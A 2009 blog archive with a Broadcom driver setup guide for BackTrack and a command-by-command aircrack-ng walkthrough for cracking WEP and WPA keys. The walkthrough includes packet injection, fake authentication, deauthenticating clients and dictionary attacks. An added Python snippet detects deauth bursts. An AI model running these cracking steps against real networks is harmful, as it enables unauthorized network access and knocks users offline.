Archive for wireless

How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10

Posted in BackTrack, Lenovo S10, Linux (Ubuntu) on September 25, 2009 by HydTech

This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.

Download this driver from here and save it in the BT root folder. You can either transfer it on a USB drive or boot into another OS on your multiboot setup and save it from there.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

make -C /lib/modules/`uname -r`/build M=`pwd`

Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko

Now the network device should show as claimed. You can check with:
lshw -C network

Bring it up:
ifconfig eth1 up

To load the module upon boot:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the module at every startup:
kate /etc/modules

add the following and close the text editor:

Load NetworkManager and Configure KnetworkManager:
Type NetworkManager in a konsole and configure the wireless at the bottom right.

Delete the files you created in the root folder now that you don't need them.

Cracking WEP & WPA with IBM Lenovo X60 – Basics

Posted in BackTrack, fedora, Linux (Ubuntu), opensuse on September 14, 2009 by HydTech

At first, injection with the Intel PRO/Wireless cards was impossible. Then came the ipwraw driver. Now we no longer need ipwraw, as the iwl3945 driver supports injection. Most Linux distros now ship with this driver.

Follow these steps for a successful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
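
The deauth step above as a monitoring sensor sees it, in an added example that is not part of the original post: it parses raw monitor-mode frames (a radiotap header is assumed) and flags a client that receives a burst of deauthentication or disassociation frames. The function names, threshold, window and sample frames are constructed for illustration.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 0xC, 0xA  # 802.11 management frame subtypes

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(pkt):
    """Return (dest, src, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(pkt) < 8:
        return None
    rt_len = struct.unpack_from("<H", pkt, 2)[0]   # radiotap header length
    dot11 = pkt[rt_len:]
    if len(dot11) < 26:                            # 24-byte header + reason code
        return None
    ftype, subtype = (dot11[0] >> 2) & 0x3, dot11[0] >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def deauth_alerts(capture, threshold=5, window=10.0):
    """capture: iterable of (timestamp, raw_frame). Flag (bssid, dest) pairs that
    receive >= threshold deauth/disassoc frames within `window` seconds."""
    seen, alerts = defaultdict(list), set()
    for ts, pkt in capture:
        hit = parse_deauth(pkt)
        if hit is None:
            continue
        dest, _src, bssid, _reason = hit
        times = seen[(bssid, dest)]
        times.append(ts)
        while times and ts - times[0] > window:    # drop hits outside the window
            times.pop(0)
        if len(times) >= threshold:
            alerts.add((bssid, dest))
    return alerts

# Constructed sample frames (not a real capture), using the MACs from the post.
def frame(fc0, dest, src, bssid, body=b"\x07\x00"):
    rt = bytes([0, 0, 8, 0, 0, 0, 0, 0])           # minimal 8-byte radiotap header
    to_b = lambda m: bytes.fromhex(m.replace(":", ""))
    return rt + bytes([fc0, 0, 0, 0]) + to_b(dest) + to_b(src) + to_b(bssid) + b"\x00\x00" + body

AP, STA = "00:14:6C:7E:40:80", "00:0F:B5:FD:FB:C2"
SAMPLE = [(0.1 * i, frame(0xC0, STA, AP, AP)) for i in range(8)]   # deauth burst
SAMPLE.append((1.0, frame(0x80, "FF:FF:FF:FF:FF:FF", AP, AP, b"\x00" * 12)))  # beacon, ignored
SAMPLE.append((30.0, frame(0xC0, "00:0F:B5:88:AC:82", AP, AP)))    # single deauth, below threshold
```

Calling deauth_alerts(SAMPLE) returns the set of (BSSID, client) pairs that crossed the threshold; a single stray deauth, which happens in normal operation, is not flagged.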

These are just refreshers. For more help check